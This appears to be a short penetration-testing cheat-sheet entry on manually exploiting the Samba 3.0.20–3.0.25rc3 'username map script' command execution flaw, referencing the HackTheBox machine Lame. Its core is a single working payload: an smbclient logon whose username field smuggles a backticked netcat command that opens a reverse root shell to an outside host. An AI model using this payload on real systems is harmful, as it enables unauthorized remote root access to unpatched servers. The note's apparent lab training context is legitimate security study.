# SMB Exploits

## usermap_script.rb

There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
Since the automated exploit does not work, log in anonymously without an account and do the following
```sh
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
```
A connection to the root shell is provided.